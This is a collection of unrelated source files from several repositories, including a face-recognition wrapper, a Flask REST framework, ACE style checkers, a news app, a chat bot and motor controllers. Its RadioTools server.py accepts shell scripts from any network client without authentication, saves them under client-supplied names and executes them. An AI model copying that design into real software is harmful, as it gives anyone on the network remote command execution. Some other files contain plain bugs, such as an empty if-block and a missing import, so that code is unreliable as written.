image_data.height, image_data.width = image.shape[:2]
image_data.channels = 1 if len(image.shape) == 2 else image.shape[2]
image_data.data = image.ctypes.data
# call extract_feature function
root = identi_lib.extract_feature(self.identifier, byref(image_data))
# read feature
feat = root[:2048]
# free feature
identi_lib.free_feature(root)
return feat
def extract_feature_with_crop(self, image, landmarks):
""" Extract feature of face
Args:
image: a color image
landmarks: a list of point (x,y), length is five
Returns:
a list of float, the length is 2048
"""
# handle pillow image
if not isinstance(image, np.ndarray):
image = np.array(image)
# prepare image data
image_data = _Image()
image_data.height, image_data.width = image.shape[:2]
image_data.channels = 1 if len(image.shape) == 2 else image.shape[2]
image_data.data = image.ctypes.data
# prepare landmarks
marks_data = _LandMarks()
for i in range(5):
marks_data.x[i], marks_data.y[i] = landmarks[i]
# call extract_feature_with_crop function
root = identi_lib.extract_feature_with_crop(self.identifier, byref(image_data), byref(marks_data))
# read feature
feat = root[:2048]
# free feature
identi_lib.free_feature(root)
return feat
def calc_similarity(self, featA, featB):
""" Calculate similarity of 2 feature
Args:
featA: a list of float, the length is 2048
featB: a list of float, the length is 2048
Returns:
a list of float, the length is 2048
"""
# prepare feature array
feat_a = (c_float * 2048)(*featA)
feat_b = (c_float * 2048)(*featB)
# call calc_similarity function
similarity = identi_lib.calc_similarity(self.identifier, feat_a, feat_b)
return similarity
def release(self):
"""
release identifier memory
"""
identi_lib.free_identifier(self.identifier)
``` |
{
"source": "54696d654a6f6c74/RadioTools",
"score": 2
} |
#### File: RadioTools/server/server.py
```python
import socket
from time import sleep
import stat
from os import listdir, chmod
from subprocess import run
from datetime import datetime
def_bytesize = 32
byte_order = "little" # littledian
def log(message):
logfile = open("LOG", "a+")
print(message)
logfile.write(message + "\n")
logfile.close()
log("Initilized on: " + str(datetime.now()))
writer = open("HOST", 'w')
local_ip = socket.gethostbyname(socket.gethostname())
if "127." in local_ip:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("192.168.0.1", 69))
local_ip = sock.getsockname()[0]
writer.write(local_ip)
writer.close()
# splitlines removes trailing \n
# because python adds them when reading files
reader = open("HOST", 'r')
HOST = reader.read().splitlines()[0]
reader.close()
reader = open("PORT", 'r')
PORT = int(reader.read())
reader.close()
reader = open("CMD_PATH", 'r')
CMD_PATH = reader.read().splitlines()[0]
reader.close()
all_commands = None
def load_commands():
global all_commands
all_commands = listdir(CMD_PATH)
def send_big_packet(target, packet: bytearray):
packet_len = len(packet)
packet_size = packet_len.to_bytes(int(def_bytesize / 8), byte_order)
target.sendall(packet_size)
target.sendall(packet)
def create_command_file(data: str, name: str):
name = name.rstrip('\x00')
path = CMD_PATH + "/" + name + ".sh"
file = open(path, 'w')
file.write(data)
file.close()
chmod(path, stat.S_IRWXU)
def call_command(cmd: str) -> bytearray:
cmd = cmd.rstrip('\x00')
path = CMD_PATH + "/" + cmd + ".sh"
result = run(["sh", path], capture_output=True)
if result.stderr != b'':
return (result.stdout + result.stderr)
else:
return result.stdout
def create_command_request(conn):
with conn:
cmd_file_size = int.from_bytes(
conn.recv(int(def_bytesize / 8)),
byte_order)
cmd_file = conn.recv(cmd_file_size)
cmd_file_name = conn.recv(def_bytesize)
conn.sendall(b'K')
create_command_file(cmd_file.decode(), cmd_file_name.decode())
def get_commands_request(conn):
with conn:
packet = bytearray('\n'.join(all_commands), "utf-8")
send_big_packet(conn, packet)
def call_command_request(conn):
with conn:
cmd = conn.recv(def_bytesize)
out = call_command(cmd.decode())
send_big_packet(conn, out)
log(out.decode())
log("Starting server on: " + HOST + ":" + str(PORT))
delay = 10
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
load_commands()
sock.bind((HOST, PORT))
sock.listen()
log("Succsess, now listening...")
while True:
conn, addr = sock.accept()
log("Connected by: " + str(addr[0]))
req = conn.recv(1).decode()
log("Recieved: " + req)
if req == 'g':
get_commands_request(conn)
elif req == 'n':
create_command_request(conn)
elif req == 'x':
call_command_request(conn)
except OSError:
log("OS error on host, will reinit in " + str(delay) + " sec...")
sleep(delay)
continue
``` |
{
"source": "54696d654a6f6c74/sleepful",
"score": 3
} |
#### File: sleepful/Behavior/Indexable.py
```python
from flask import Blueprint, Response
from Behavior import Behavior
from DataHandler import DataHandler
class Indexable(Behavior):
"""
Behavior for data that can be accessed
via enumerable indices
"""
def __init__(self, route: str, data_handler: type[DataHandler], **args):
self.data_handler = data_handler
self.route = route
self.fields = args["fields"]
def get_data_for_index(self, index: int):
data_dict = {}
with self.data_handler(self.route) as handler:
try:
data_dict = handler.get_data_fields(index, self.fields)
except AttributeError:
return Response(status = 404)
return data_dict
def get_data_for_item(self, index: int, file_name: str):
data = {}
try:
with self.data_handler(self.route) as handler:
data = handler.get_data_field(index, file_name)
except FileNotFoundError:
return Response(status = 404)
return data
def _bind(self, bp: Blueprint):
bp.add_url_rule("/<int:index>",
view_func = self.get_data_for_index,
methods = ['GET']
)
bp.add_url_rule("/<int:index>/<string:file_name>",
view_func = self.get_data_for_item,
methods = ['GET']
)
```
#### File: sleepful/Behavior/Updateable.py
```python
from .Indexable import Indexable
from flask import Response, Blueprint, request
from json import dumps
class Updateable(Indexable):
def update_file(self, file_name: str, index: int) -> Response:
data = request.get_json()
data_to_write = dumps(data[file_name])
try:
with self.data_handler(self.route) as handler:
handler.update_data(index, file_name, data_to_write)
except FileNotFoundError:
return Response(status = 404)
return Response(status = 200)
def update_all_files(self, index: int) -> Response:
data = request.get_json()
try:
with self.data_handler(self.route) as handler:
handler.update_multiple(index, self.fields, data)
except FileNotFoundError:
return Response(status = 404)
return Response(status = 200)
def _bind(self, bp: Blueprint):
bp.add_url_rule("/<int:index>",
view_func = self.update_all_files,
methods = ['PUT']
)
bp.add_url_rule("/<int:index>/<string:file_name>",
view_func = self.update_file,
methods = ['PUT']
)
super()._bind(bp)
```
#### File: DataHandler/Filesys/FilesysData.py
```python
from DataHandler import DataHandler
from json import load, dump, dumps
from os.path import isdir, isfile
from os import listdir, mkdir
from shutil import rmtree
class FilesysData(DataHandler):
def __init__(self, root_path: str):
self.root = root_path
def __enter__(self):
return self
def __exit__(self, exec_type, exec_value, traceback):
pass
def get_data_field(self, index: int, field_name: str) -> dict:
file = self._open_file(f"{str(index)}/{field_name}")
data = load(file)
file.close()
return data
def get_data_fields(self, index: int, fields: list, sort_data: bool = False) -> dict:
data = {}
for file_name in fields:
file = self._open_file(f"{str(index)}/{file_name}")
data[file_name] = load(file)
file.close()
if sort_data:
return sorted(data)
return data
def get_all_entry_indices(self, sort_data: bool = True) -> list:
all_entries = self._get_files(sort_data = sort_data)
return all_entries
def update_data(self, index: int, field_name: str, payload: str):
file = self._open_file(f"{str(index)}/{field_name}", 'w')
file.write(payload)
file.close()
def update_multiple(self, index: int, fields: list, payload: dict):
path = str(index)
for file_name in fields:
target = self._open_file(f"{path}/{file_name}", 'w')
target.write(dumps(payload[file_name]))
target.close()
def new_data(self, payload: dict):
files = self._get_files()
num_files = len(files)
path = None
if num_files > 0:
path = f"{self.root}/{str(int(files[-1]) + 1)}"
else:
path = f"{self.root}/1"
mkdir(path)
for file, data in payload.items():
writer = open(f"{path}/{file}.json", "w+")
dump(data, writer)
writer.close()
def remove_data(self, index: int):
path = f"{self.root}/{index}"
rmtree(path)
def _open_file(self, file_path: str, action: str = 'r'):
path = f"{self.root}/{file_path}.json"
if not isfile(path):
raise AttributeError("The provided path does not resolve to a file")
return open(path, action)
def _get_files(self, folder_path: str = "", sort_data: bool = True) -> list:
path = f"{self.root}/{folder_path}"
if not isdir(path):
raise AttributeError("The provided path does not resolve to a folder")
files = listdir(path)
if sort_data:
files = sorted(files)
return files
```
#### File: DataHandler/Meta/DataHandler.py
```python
from abc import ABC, abstractmethod
class DataHandler(ABC):
@abstractmethod
def __init__(self, root_path: str):
...
@abstractmethod
def __enter__(self):
...
@abstractmethod
def __exit__(self, exec_type, exec_value, traceback):
...
@abstractmethod
def get_data_field(self, index: int, field_name: str) -> dict:
...
def get_data_fields(self, index: int, fields: list, sort_data: bool = False) -> dict:
...
def get_all_entry_indices(self, sort_data: bool = True) -> list:
...
@abstractmethod
def update_data(self, index: int, field_name: str, payload: str):
...
@abstractmethod
def update_multiple(self, index: int, fields: list, payload: dict):
...
@abstractmethod
def new_data(self, payload: dict):
...
@abstractmethod
def remove_data(self, index: int):
...
``` |
{
"source": "549654033/RDHelp",
"score": 2
} |
#### File: PythonACE/fuzz/check_no_tabs.py
```python
import _types
type_list = _types.source_files + _types.header_files + _types.inline_files + _types.idl_files
from sys import stderr
import re
regex = re.compile ("\t")
error_message = ": error: contains tab characters\n"
from _generic_handler import generic_handler
def handler (file_name, file_content):
return generic_handler_no_exceptions (regex, error_message, file_name, file_content)
```
#### File: PythonACE/fuzz/_generic_handler.py
```python
from sys import stderr
import _warning_handler
def generic_handler (regex, begin_exclude, end_exclude, error_message, file_name, file_content, warn = False):
retval = 0
if regex.search (file_content) != None:
# We have a potential violation, lets check
lines = file_content.splitlines ()
exclusion = False
for line in range (len (lines)):
if begin_exclude.search (lines[line]) != None:
exclusion = True
elif end_exclude.search (lines[line]) != None:
exclusion = False
elif (exclusion == False) and (regex.search (lines[line]) != None):
# Violation!
msg = file_name + ':' + str (line + 1) + error_message
if not warn:
stderr.write (msg)
retval = 1
else:
handler = _warning_handler.Warning_Handler.getInstance ()
handler.add_warning (msg)
return retval
def generic_handler_no_exceptions (regex, error_message, file_name, file_content, warn = False):
retval = 0
if regex.search (file_content) != None:
# We have a potential violation, lets check
lines = file_content.splitlines ()
for line in range (len (lines)):
if regex.search (lines[line]) != None:
msg = file_name + ':' + str (line + 1) + error_message
# Violation!
if not warn:
stderr.write (msg)
retval = 1
else:
Warning_Handler.getInstance ().add_warning (msg)
return retval
```
#### File: PythonACE/fuzz/__init__.py
```python
file_type_handlers = dict ()
def register_handler (module):
for item in module.type_list:
if file_type_handlers.has_key (item):
file_type_handlers[item].append (module.handler)
else:
handlers = list ()
handlers.append (module.handler)
file_type_handlers[item] = handlers
import re
extension_re = re.compile(".+\.([^.]+)$")
# The following is the initialization logic that is executed
# when the fuzz module is loaded
from os import listdir, chdir, getcwd
from sys import stderr, path
oldwd = getcwd ()
try:
# The following is a trick to get the directory THIS SCRIPT - note, not necessarily the CWD -
# is located. We use this path later to load all of the available fuzz checks.
import _path
script_path = str (_path).split ()[3][1:-11]
if script_path == "":
script_path = "."
chdir (script_path)
path.append (getcwd ())
files = listdir (".")
modules = list ()
# We need to import the warning handler here. If we use a traditional import elsewhere,
# we get all kinds of problems with the warning_handler being imported twice - once as
# fuzz._warning_handler and again as _warning_handler - making the singleton instances
# NOT the same.
_warning_handler = __import__ ("_warning_handler")
Warning_Handler = _warning_handler.Warning_Handler
STDERR = _warning_handler.STDERR
MAILER = _warning_handler.MAILER
for item in files:
if (item[0] != '_') and (item[-3:] == ".py"):
print "Registering " + item [:-3]
try:
module = __import__ (item[:-3])
register_handler (module)
except:
stderr.write ("FUZZ ERROR: Unable to load the " + item[:-3] + " module, please notify the build czar\n")
finally:
chdir (oldwd)
def fuzz_check (file_name, file_content):
# If the user of the module has not instanciated the warning handler,
# lets do it here
if not Warning_Handler._isInstantiated ():
Warning_Handler.getInstance (STDERR)
# get the file extension
ext_match = extension_re.search (file_name)
if ext_match == None:
# we don't have no stinking file extension!
ext = ""
else:
ext = ext_match.group (1)
retval = 0
if file_type_handlers.has_key (ext):
for handler in file_type_handlers[ext]:
try: # We don't want one misbehaving handler to screw up the whole sustem
retval += handler (file_name, file_content)
except:
stderr.write ("An unknown exception was thrown while trying to run one of the handlers\n")
# Run the generic handlers
for handler in file_type_handlers["*"]:
try: # We don't want one misbehaving handler to screw up the whole sustem
retval += handler (file_name, file_content)
except:
stderr.write ("An unknown exception was thrown while trying to run one of the handlers\n")
return retval
```
#### File: PythonACE/fuzz/inline.py
```python
from _types import inline_files
type_list = inline_files
from sys import stderr
import re
regex = re.compile ("(\s|^)+inline\s+")
begin_exclude = re.compile ("FUZZ\: disable check_for_inline")
end_exclude = re.compile ("FUZZ\: enable check_for_inline")
error_message = ": error: contains a C++ inline keyword, instead of ACE_INLINE\n"
from _generic_handler import generic_handler
def handler (file_name, file_content):
return generic_handler (regex, begin_exclude, end_exclude, error_message, file_name, file_content)
```
#### File: PythonACE/fuzz/newline.py
```python
type_list = ["cpp", "h", "inl", "html", "idl", "pl"]
import re
from sys import stderr
regex = re.compile ("\n\Z")
def handler (file_name, file_content):
if regex.search (file_content) == None:
stderr.write (file_name + ":0: error: " + file_name + " lacks a newline at the end of the file.\n")
return 1
else:
return 0
```
#### File: PythonACE/fuzz/noncvs.py
```python
type_list = ["icc", "ncb", "opt", "zip", "dsw",
"vcproj", "dsw", "bor", "vcp", "pdb",
"o", "ilk", "pyc", "so", "dll", "lib" ]
from sys import stderr
def handler (file_name, file_content):
stderr.write (file_name + ":0: error: This file should not be checked into the repository\n")
return 1
```
#### File: PythonACE/fuzz/streams_include.py
```python
import _types
type_list = _types.source_files +_types. header_files + _types.inline_files
import re
regex = re.compile ("^\s*#\s*include\s*(\/\*\*\/){0,1}\s*\"ace\/streams\.h\"")
begin_exclude = re.compile ("FUZZ\: disable check_for_streams_include")
end_exclude = re.compile ("FUZZ\: enable check_for_streams_include")
error_message = ": warning: expensive ace/streams.h included; consider ace/iosfwd.h\n"
from _generic_handler import generic_handler
def handler (file_name, file_content):
return generic_handler (regex, begin_exclude,
end_exclude, error_message,
file_name, file_content, True)
``` |
{
"source": "54adana/News-Highlights",
"score": 3
} |
#### File: News-Highlights/app/request.py
```python
from app import app
import urllib.request,json
from .models import news
News = news.News
# Getting api key
api_key = app.config['NEWS_API_KEY']
#Getting the news base url
base_url = app.config["NEWS_API_BASE_URL"]
def get_news(category):
'''
Function that gets the json response to our url request
'''
get_news_url = base_url.format(category, api_key)
with urllib.request.urlopen(get_news_url) as url:
get_news_data = url.read()
get_news_response = json.loads(get_news_data)
news_results = None
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_results(news_results_list)
return news_results
def process_results(news_list):
'''
Function that processes the news result and transform them to a list of Objects
Args:
news_list: A list of dictionaries that contain news details
Returns :
news_results: A list of news objects
'''
news_results = []
for news_item in news_list:
source = news_item.get('source')
title = news_item.get('title')
description = news_item.get('description')
poster = news_item.get('urlToImage')
url = news_item.get('url')
# category = news_item.get('category')
news_object = News(source, title, description, poster, url)
news_results.append(news_object)
return news_results
def get_News(id):
get_news_details_url = base_url.format(id,api_key)
with urllib.request.urlopen(get_news_details_url) as url:
news_details_data = url.read()
news_details_response = json.loads(news_details_data)
news_object = None
if news_details_response:
id = news_details_response.get('id')
title = news_details_response.get('title')
description = news_details_response.get(' description')
poster = news_details_response.get('poster')
news_object = News(id,title, description,poster,url)
return News_object
``` |
{
"source": "54adana/password-locker",
"score": 4
} |
#### File: 54adana/password-locker/credentials_test.py
```python
import unittest # Importing the unittest module
from credentials import User,Credentials # Importing the credentials class
import pyperclip
class TestUser(unittest.TestCase):
def setUp(self):
self.new_user =User ("Yvette","Adana","0786574531","<EMAIL>") #Create password object
def test_init(self):
self.assertEqual(self.new_user.first_name,"Yvette")
self.assertEqual(self.new_user.last_name,"Adana")
self.assertEqual(self.new_user.phone_number,"0786574531")
self.assertEqual(self.new_user.email,"<EMAIL>")
def test_save_user(self):
'''
test_save_user test case to test if the user object is saved into
the user list
'''
self.new_user.save_user()
# saving the new user
self.assertEqual(len(User.user_list),1)
# setup and class creation up here
def tearDown(self):
'''
tearDown method that does clean up after each test case has run.
'''
User.user_list = []
def test_delete_user(self):
'''
test_delete_user to test if we can remove a user from our user list
'''
self.new_user.save_user()
test_user =("Yvette","Adana","0786574531","<EMAIL>") # user
# test_user.save_user()
class TestCredentials(unittest.TestCase):
def setUp(self):
self.new_credentials =Credentials ("facebook","gift254","<NAME>")
def test_init(self):
self.assertEqual(self.new_credentials.account,"facebook")
self.assertEqual(self.new_credentials.password,"<PASSWORD>")
self.assertEqual(self.new_credentials.user_name,"<NAME>")
def test_save_credentials(self):
self.new_credentials.save_credentials()
# saving the new credentials
self.assertEqual(len(Credentials.credentials_list),1)
# setup and class creation up here
def tearDown(self):
Credentials.credentials_list = []
# other test cases here
def test_save_multiple_credentials(self):
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new credentials
# More tests above
def test_delete_credentials(self):
'''
test_delete_credentials to test if we can remove a credentials from our credentials list
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new credentials
test_credentials.save_credentials()
def test_find_credentials_by_password(self):
'''
test to check if we can find a credentials by phone number and display information
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new credentials
test_credentials.save_credentials()
# found_credentials = Credentials.find_by_password("<PASSWORD>")
# self.assertEqual(found_credentials.credentials,test_credentials.password)
def test_credentials_exists(self):
'''
test to check if we can return a Boolean if we cannot find the credentials.
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new contact
test_credentials.save_credentials()
credentials_exists = Credentials.credentials_exist("gift254")
self.assertTrue(credentials_exists)
def test_display_all_credentials(self):
'''
method that returns a list of all credentials saved
'''
self.assertEqual(Credentials.display_credentials(),Credentials.credentials_list)
# def test_copy_email(self):
# '''
# Test to confirm that we are copying the email address from a found credential
# '''
# self.new_credentials.save_credentials()
# Credentials.copy_email("<EMAIL>")
# self.assertEqual(self.new_credentials.email,pyperclip.paste())
def test_display_credentials(self):
'''
method that returns a list of all credentials saved
'''
self.assertEqual(Credentials.display_credentials(),Credentials.credentials_list)
if __name__ == '__main__':
unittest.main() # self.assertEqual(len(Credentials.credentials_list))
``` |
{
"source": "54bp6cl6/MiaAndMax",
"score": 2
} |
#### File: MiaAndMax/controller/default.py
```python
from controller.base import Controller
from service.reply import ReplyService
from service.user import UserService
from view import (
base
)
from linebot.models import (
FollowEvent, UnfollowEvent, TextMessage
)
class DefaultController(Controller):
def __init__(self, replyService: ReplyService):
super().__init__(replyService)
def handleMessageEvent(self, params):
event = params["event"]
if isinstance(event.message, TextMessage):
if event.message.text == "寶欸我愛尼!!!":
else:
pass
```
#### File: MiaAndMax/db/firestoreService.py
```python
from google.cloud import firestore
class FirestoreService:
def __init__(self):
self.db = firestore.Client()
def getChannelVars(self):
'''
Get Line Channel Access Token and Secret,
return (access_token, secret).
'''
config = self.db.collection(u'linebot').document(u'config').get().to_dict()
return (config["LINE_CHANNEL_ACCESS_TOKEN"], config["LINE_CHANNEL_SECRET"])
def getUserId(self, username: str) -> str | None:
users = self.db.collection(u'linebot').document(u'user').get().to_dict()
return users[username] if username in users else None
def setUserId(self, username: str, user_id: str):
self.db.collection(u'linebot').document(u'user').update({
username: user_id
})
def deleteUserId(self, username: str):
self.db.collection(u'linebot').document(u'user').update({
username: firestore.DELETE_FIELD
})
```
#### File: 54bp6cl6/MiaAndMax/router.py
```python
import sys
from controller.base import Controller
from controller.miaBinding import MiaBindingController
from db.firestoreService import FirestoreService
from service.reply import ReplyService
from service.user import UserService
from view import base
from linebot import LineBotApi
class Router:
def __init__(self, bot: LineBotApi, dbService: FirestoreService):
self.bot = bot
self.dbService = dbService
self.middlewares = [
self.useLinebotErrorMessage,
self.useUserService,
self.useMiaBinding,
self.useContext,
self.useDefaultReply,
]
self.replyService = ReplyService(self.bot)
def route(self, event):
params = {
"event": event,
}
self.nextMiddleware(params)
def nextMiddleware(self, params):
if len(self.middlewares) > 0:
next = self.middlewares.pop(0)
print("Into:", next.__name__, "middleware")
next(params)
# ========== Middlewares ==========
def useLinebotErrorMessage(self, params):
try:
self.nextMiddleware(params)
except:
self.replyService.replyMessage(
params["event"], base.TextMessage(str(sys.exc_info())))
def useUserService(self, params):
self.userService = UserService(self.dbService, self.replyService)
self.nextMiddleware(params)
def useMiaBinding(self, params):
controller = MiaBindingController(self.replyService, self.userService)
if not controller.handleEvent(params):
self.nextMiddleware(params)
return
def useAuthentication(self, params):
if self.userService.authenticate(params["event"].source.user_id):
self.nextMiddleware(params)
else:
self.replyService.replyMessage(
params["event"], base.TextMessage("本服務只對尊貴且唯一的蘇苡甄小姐開放,謝謝。"))
def useContext(self, params):
self.nextMiddleware(params)
def useDefaultReply(self, params):
self.nextMiddleware(params)
``` |
{
"source": "54chen/deep",
"score": 2
} |
#### File: 54chen/deep/test7.py
```python
import numpy
from sklearn.model_selection import GridSearchCV
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.wrappers.scikit_learn import KerasClassifier
from keras.constraints import maxnorm
from keras.wrappers.scikit_learn import BaseWrapper
import copy
def custom_get_params(self, **params):
res = copy.deepcopy(self.sk_params)
res.update({'build_fn': self.build_fn})
return res
BaseWrapper.get_params = custom_get_params
# Function to create model, required for KerasClassifier
def create_model(neurons=1):
# create model
model = Sequential()
model.add(Dense(neurons, input_dim=8, init='uniform', activation='softplus', W_constraint=maxnorm(4)))
model.add(Dropout(0.1))
model.add(Dense(1, init='uniform', activation='sigmoid'))
# Compile model
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
# fix random seed for reproducibility
seed = 7
numpy.random.seed(seed)
# load dataset
dataset = numpy.loadtxt("0207.csv", delimiter=",")
# split into input (X) and output (Y) variables
X = dataset[:,0:8]
Y = dataset[:,8]
# create model
model = KerasClassifier(build_fn=create_model, nb_epoch=50, batch_size=10, verbose=0)
# define the grid search parameters
neurons = [1, 5, 10, 15, 20, 25, 30]
param_grid = dict(neurons=neurons)
grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1)
grid_result = grid.fit(X, Y)
# summarize results
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
``` |
{
"source": "54hanxiucao/gym-electric-motor",
"score": 3
} |
#### File: examples/classic_controllers/simple_controllers.py
```python
import time
from gym.spaces import Discrete, Box
import sys
import os
sys.path.append(os.path.abspath(os.path.join('..')))
from gym_electric_motor.physical_systems.electric_motors import DcShuntMotor, DcExternallyExcitedMotor, \
DcPermanentlyExcitedMotor, DcSeriesMotor
from gym_electric_motor.physical_systems import SynchronousMotorSystem, DcMotorSystem
import math
import numpy as np
class Controller:
"""
The following is a base class for various controllers along with the motor environments
"""
@classmethod
def make(cls, controller_type, environment, **controller_kwargs):
"""
Args:
controller_type : Choose among the given set of controllers at the end of this class
environment : Choose the corresponding motor environment from 'envs' class.
"""
assert controller_type in _controllers.keys(), f'Controller {controller_type} unknown'
controller = _controllers[controller_type](environment, **controller_kwargs)
return controller
def control(self, state, reference):
raise NotImplementedError
def reset(self):
pass
class OnOffController(Controller):
"""
The following controller is a simple on-off controller with optional hysteresis which allows the state to choose
high_action when referenced_state is below ref_idx and low_action otherwise. A 'hysteresis' value should be integrated
(chosen as 0.01) in this controller because of the constant switching and high frequency around the reference_idx.
Valid for motors with discrete action space
"""
def __init__(self, environment, hysteresis=0.01, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Discrete, 'Not suitable action space for On off controller'
self._hysteresis = hysteresis
self._high_action = 1
if action_space.n in [3, 4]:
self._low_action = 2
else:
self._low_action = 0
if state_idx is None:
self._referenced_state = np.argmax(
environment.reference_generator.referenced_states[environment.state_filter]
)
else:
self._referenced_state = state_idx
self._ref_idx = reference_idx
def control(self, state, reference):
if state[self._referenced_state] < reference[self._ref_idx] - self._hysteresis:
return self._high_action
else:
return self._low_action
class ThreePointController(Controller):
"""
Below is an implementation of a 3 point controller: When state_idx is below the reference_idx, it choose high_action and when the
state_idx is above the reference_idx,it choose low_action. If it is between the reference_idx values, it will choose idle_action
A 'hysteresis' value should be integrated(chosen as 0.01) in this controller because of the constant switching and
high frequency around the reference_idx.
Valid for motors with discrete action space
"""
def __init__(self, environment, hysteresis=0.01, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Discrete, 'Not suitable action space for three point controller'
self._hysteresis = hysteresis
self._high_action = 1
self._idle_action = 0
self._ref_idx = reference_idx
if action_space.n in [3, 4]:
self._low_action = 2
else:
self._low_action = 0
if state_idx is None:
self._referenced_state = np.argmax(
environment.reference_generator.referenced_states[environment.state_filter]
)
else:
self._referenced_state = state_idx
def control(self, state, reference):
if state[self._referenced_state] < reference[self._ref_idx] - self._hysteresis:
return self._high_action
elif state[self._referenced_state] > reference[self._ref_idx] + self._hysteresis:
return self._low_action
else:
return self._idle_action
class PController(Controller):
"""
In the below proportional control implementation, the controller output is proportional to the error signal,
which is the difference between the reference_idx and the state_idx .i.e., the output of a proportional controller
is the multiplication product of the error signal and the proportional gain. Here kp =10 is assumed for
proportionality gain by default, which is likely to require adaption to a given control plant.
Valid for DC motor system
"""
def __init__(self, environment, k_p=10, controller_no=0, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No suitable action space for P Controller'
self._k_p = k_p
self._controller_no = controller_no
self._action_min = action_space.low[controller_no]
self._action_max = action_space.high[controller_no]
self._ref_idx = reference_idx
if state_idx is None:
self._referenced_state = np.argmax(
environment.reference_generator.referenced_states[environment.state_filter]
)
else:
self._referenced_state = state_idx
def control(self, state, reference):
return np.array([
max(
self._action_min,
min(
self._action_max,
self._k_p * (reference[self._ref_idx] - state[self._referenced_state])
)
)
])
class IController(Controller):
"""
In the below integral control implementation, the controller output is proportional to the integral of error signal,
which is the difference between the reference_idx and the state_idx .i.e., the output of a integral controller
is the multiplication product of the error signal and integral gain.
Here k_i =0.01 is assumed for integral gain by default which is likely to require individual tuning based on the given control plant.
Valid for DC motor system
"""
def __init__(self, environment, k_i=0.01, controller_no=0, state_idx=None, reference_idx=0):
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No Suitable action Space for I controller'
self._k_i = k_i
self._tau = environment.physical_system.tau
self._integrated_value = 0
self._limits = environment.physical_system.limits
self._controller_no = controller_no
self._action_min = action_space.low[controller_no]
self._action_max = action_space.low[controller_no]
self._ref_idx = reference_idx
self._referenced_state = state_idx or np.argmax(environment.reference_generator.referenced_states)
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
self._integrated_value += diff * self._tau
if self._integrated_value > self._referenced_state_max: # check upper limit
self._integrated_value = self._referenced_state_max
else:
self._integrated_value = self._integrated_value - diff * self._k_i # anti-reset windup
if self._integrated_value < self._referenced_state_min: # check upper limit
self._integrated_value = self._referenced_state_min
else:
self._integrated_value = self._integrated_value - diff * self._k_i # anti-reset windup
return np.array([
max(
self._action_min,
min(
self._action_max, self._k_i * self._integrated_value
)
)
])
def reset(self, **__):
self._integrated_value = 0
class PIController(PController):
"""
This class performs discrete-time PI controller computation using the error signal and
proportional and integral gain inputs. The error signal is the difference between the reference_idx and the
referenced_state. It outputs a weighted sum of the input error signal and the integral of the input error signal.
Valid for DC motor system
"""
def __init__(self, environment, k_p=10, k_i=0.01, controller_no=0, reference_idx=0):
super().__init__(environment, k_p, controller_no, reference_idx)
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No suitable action space for PI Controller'
self._k_i = k_i
self._ref_idx = reference_idx
self._tau = environment.physical_system.tau
self._limits = environment.physical_system.limits
self._integrated_value = 0
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
self._motor_parameter = environment.physical_system.electrical_motor.motor_parameter
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
self._integrated_value += diff * self._tau
if self._integrated_value > self._referenced_state_max: # check upper limit
self._integrated_value = self._referenced_state_max
else:
self._integrated_value = self._integrated_value - diff * self._tau # anti-reset windup
if self._integrated_value < self._referenced_state_min: # check lower limit
self._integrated_value = self._referenced_state_min
else:
self._integrated_value = self._integrated_value - diff * self._tau # anti-reset windup
return np.array([
max(
self._action_min,
min(
self._action_max,
self._k_p * (reference[self._ref_idx] - state[self._referenced_state])
+ self._k_i * self._integrated_value
)
)
])
def reset(self, **__):
self._integrated_value = 0
class DController(Controller):
"""
In the below derivative control implementation, the controller output is proportional to the derivative of error,
which is the difference between the reference_idx and the state_idx .i.e., the output of a derivative controller
is the multiplication product of the error signal and derivative gain.
Here k_d =1 is assumed for the differential gain by default which is likely to require individual tuning based on the given control plant.
Valid for DC motor system
"""
def __init__(self, environment, k_d=1, controller_no=0, state_idx=None, reference_idx=0):
self._derivative_value = 0
self._tau = environment.physical_system.tau
self._prev_error = 0
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system), 'No suitable action space for P Controller'
self._k_d = k_d
self._controller_no = controller_no
self._tau = environment.physical_system.tau
self._action_min = action_space.low[controller_no]
self._action_max = action_space.high[controller_no]
self._limits = environment.physical_system.limits
self._ref_idx = reference_idx
self._referenced_state = state_idx or np.argmax(environment.reference_generator.referenced_states)
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
de = diff - self._prev_error
self._derivative_value = de / self._tau
self._prev_error = diff
return np.array([
max(
self._action_min,
min(
self._action_max,
self._k_d * self._derivative_value
)
)
])
